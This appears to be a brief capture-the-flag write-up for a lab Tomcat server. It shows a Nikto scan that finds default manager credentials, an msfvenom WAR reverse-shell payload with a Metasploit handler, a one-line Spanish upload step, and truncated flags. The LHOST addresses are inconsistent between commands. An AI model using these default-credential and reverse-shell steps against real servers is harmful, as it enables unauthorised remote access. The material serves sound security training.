10.10.10.95
+ Server: Apache-Coyote/1.1 + The anti-clickjacking X-Frame-Options header is not present. + The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS + The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type + No CGI Directories found (use '-C all' to force check all possible dirs) + Server leaks inodes via ETags, header found with file /favicon.ico, fields: 0xW/21630 0x1525691762000 + OSVDB-39272: favicon.ico file identifies this server as: Apache Tomcat + Allowed HTTP Methods: GET, HEAD, POST, PUT, DELETE, OPTIONS + OSVDB-397: HTTP method ('Allow' Header): 'PUT' method could allow clients to save files on the web server. + OSVDB-5646: HTTP method ('Allow' Header): 'DELETE' may allow clients to remove files on the web server. + Web Server returns a valid response with junk HTTP methods, this may cause false positives. + /examples/servlets/index.html: Apache Tomcat default JSP pages present. + OSVDB-3720: /examples/jsp/snp/snoop.jsp: Displays information about page retrievals, including other users. + Default account found for 'Tomcat Manager Application' at /manager/html (ID 'tomcat', PW 's3cret'). Apache Tomcat. + /host-manager/html: Default Tomcat Manager / Host Manager interface found + /manager/html: Tomcat Manager / Host Manager interface found (pass protected) + /manager/status: Tomcat Server Status interface found (pass protected) + 7604 requests: 0 error(s) and 14 item(s) reported on remote host + End Time: 2018-07-04 16:01:37 (GMT1) (310 seconds)
+ Default tomcaaccount found for ‘Tomcat Manager Application’ at /manager/html (ID ‘tomcat’, PW ‘s3cret’). Apache Tomcat.
http://10.10.10.95:8080/manager/html
root@kali:~# msfvenom -p java/shell_reverse_tcp LHOST=10.10.14.8 LPORT=4444 -f war > algo.war msf > use exploit/multi/handler msf exploit(multi/handler) > set payload java/shell_reverse_tcp payload => java/shell_reverse_tcp msf exploit(multi/handler) > set LHOST 10.10.14.7 LHOST => 10.10.14.7 msf exploit(multi/handler) > run Subes el archivo al manager y lo abres y eso es todo C:\Users\Administrator\Desktop\flags>more "2 for the price of 1.txt" more "2 for the price of 1.txt" user.txt 7004dbcef0f854e0... root.txt 04a8b36e1545a455...